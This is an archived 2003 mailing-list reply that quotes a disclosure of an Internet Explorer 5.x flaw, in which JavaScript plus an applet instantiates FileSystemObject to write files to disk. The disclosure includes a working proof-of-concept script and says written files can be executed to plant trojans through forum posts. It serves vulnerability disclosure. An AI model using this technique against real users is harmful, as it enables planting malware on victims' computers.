Re: Internet Explorer JavaScript insecure function

From: npguy (npguy_at_websurfer.com.np)
Date: 12/09/03

  • Next message: npguy: "Re: locating default signal handler for SIGSEGV"
    Date: Tue, 9 Dec 2003 08:01:10 +0545
    To: "FREEBRAIN" <freebrain@unionnewbies.net>
    
    

    Hi freebrain,

    exploit not working in ie6.
    urs `Proof of concept` require `applet`
    in html. could u please post an html?

    Sunday, December 7, 2003, 8:41:57 PM, you wrote:

    F> * Internet Explorer JavaScript insecure function *

    F> Product: Microsoft Internet Explorer
    F> Version: 5.x (probabily other versions may be affected)

    F> ***

    F> Problem:

    F> I discovered a javascript function (interpreted by Internet Explorer) called
    F> "file.writeline()" may be
    F> potentially dangerous for Internet Explorer users. This function allows to
    F> write files by means of
    F> JavaScript on a hard disk.

    F> An attacker may use this function writting JavaScript code in posts of
    F> forums, guestbooks, etc for owning
    F> his victim's computers. With "file.writeline()" function the attacker can
    F> write trojans/virus/etc on his
    F> victim's hard disks, for example, an attacker may use JavaScript
    F> "file.writeline()" function for writting
    F> a malicious file in VBS (Visual Basic Scripting) language.

    F> I repeat, this may be potentially dangerous for Internet Explorer users.

    F> NOTE: Actually a virus in the wild that affects to mIRC users is using this
    F> function ("file.writeline").

    F> NOTE2: As you can see on the "Proof of concept", other functions are needed
    F> to carry out an "intrusion".

    F> ***

    F> Proof of concept:

    F> InterfaceObject=document.applets[0];
    F> setTimeout("Write()",1000);
    F> function Write() {
    F> fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
    F> InterfaceObject.setCLSID(fsoClassID);
    F> fso = InterfaceObject.createInstance();
    F> // windir = fso.getspecialfolder ;
    F> filename = "\\proof.txt";
    F> var filecontent = "Hello world";
    F> file = fso.opentextfile(filename, "2", "TRUE");
    F> file.writeline(filecontent)
    F> file.close();

    F> }

    F> This code writes a file called "proof.txt" in the hard disk, with the
    F> content "Hello world". Also you can
    F> execute files you write by means of JavaScript adding "Run();" to the
    F> function.

    F> ***

    F> Solution:

    F> I'm not sure about the solution but I recommend to upgrade to the last
    F> version of Internet Explorer.
    F> Also I recommend webmasters to forbid HTML codes that content this function
    F> in their forums, guestbooks, etc.

    F> ***

    F> Thanks to:

    F> #disidents,#hackers,#hacker @ irc-phoenix.org

    F> #disidents,#sleepx,#ayuda_internet @ irc-hispano.org

    F> Special thanks go to: Impos, |_Tr0mP4s

    F> (sorry my poor english)

    F> ***

    F> By FREEBRAIN

    F> FREEBRAIN is a member of DisidentS Hacker Team

    F> http://disidents-team.cjb.net (under construction) -
    F> http://www.gratisweb.com/disidents

    F> <freebrain@unionnewbies.net> ( www.unionnewbies.net )


  • Next message: npguy: "Re: locating default signal handler for SIGSEGV"

    Relevant Pages

    • RE: Internet Explorer JavaScript insecure function
      ... Product: Microsoft Internet Explorer ... I discovered a javascript function called ... With "file.writeline" function the attacker can ... this may be potentially dangerous for Internet Explorer users. ...
      (Vuln-Dev)
    • Internet Explorer JavaScript insecure function
      ... Product: Microsoft Internet Explorer ... I discovered a javascript function called ... With "file.writeline" function the attacker can ... This code writes a file called "proof.txt" in the hard disk, ...
      (Vuln-Dev)
    • [Full-Disclosure] Internet Explorer JavaScript insecure function
      ... Product: Microsoft Internet Explorer ... I discovered a javascript function called "file.writeline" may be ... An attacker may use this function writting JavaScript code in posts of forums, guestbooks, etc for owning ... this may be potentially dangerous for Internet Explorer users. ...
      (Full-Disclosure)
    • Re: CGI, PATH_INFO, convenience/security (TXT or HTML? -- IE NEW BUG)
      ... CGI, PATH_INFO, convenience/security (TXT or HTML? ... And functions that display potentially hostile content ... > Javascript will be unable to get the "control" cookie, ... > give the attacker the ability to do anything beyond using acmemail to read ...
      (Bugtraq)
    • How to insert a new row to an existing HTML table
      ... The following code (HTML) generates a table. ... The following code (javascript) works with the Internet Explorer and also ... var xtable ...
      (microsoft.public.scripting.jscript)